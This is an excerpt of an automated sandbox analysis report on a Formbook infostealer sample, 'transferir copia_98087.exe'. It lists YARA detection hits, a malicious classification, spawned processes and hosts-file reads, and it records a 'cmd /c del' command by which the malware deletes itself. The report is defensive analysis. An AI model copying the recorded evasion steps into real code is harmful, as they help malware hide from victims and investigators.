            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: transferir copia_98087.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/9
            Source: C:\Users\user\Desktop\transferir copia_98087.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferir copia_98087.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_01
            Source: transferir copia_98087.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\transferir copia_98087.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\transferir copia_98087.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: transferir copia_98087.exe, 00000000.00000002.226455880.0000000003111000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: transferir copia_98087.exe, 00000000.00000002.226455880.0000000003111000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: transferir copia_98087.exeVirustotal: Detection: 22%
            Source: transferir copia_98087.exeReversingLabs: Detection: 12%
            Source: unknownProcess created: C:\Users\user\Desktop\transferir copia_98087.exe 'C:\Users\user\Desktop\transferir copia_98087.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\transferir copia_98087.exe C:\Users\user\Desktop\transferir copia_98087.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\transferir copia_98087.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\transferir copia_98087.exeProcess created: C:\Users\user\Desktop\transferir copia_98087.exe C:\Users\user\Desktop\transferir copia_98087.exeJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\transferir copia_98087.exe'Jump to behavior
            Source: C:\Users\user\Desktop\transferir copia_98087.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: transferir copia_98087.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR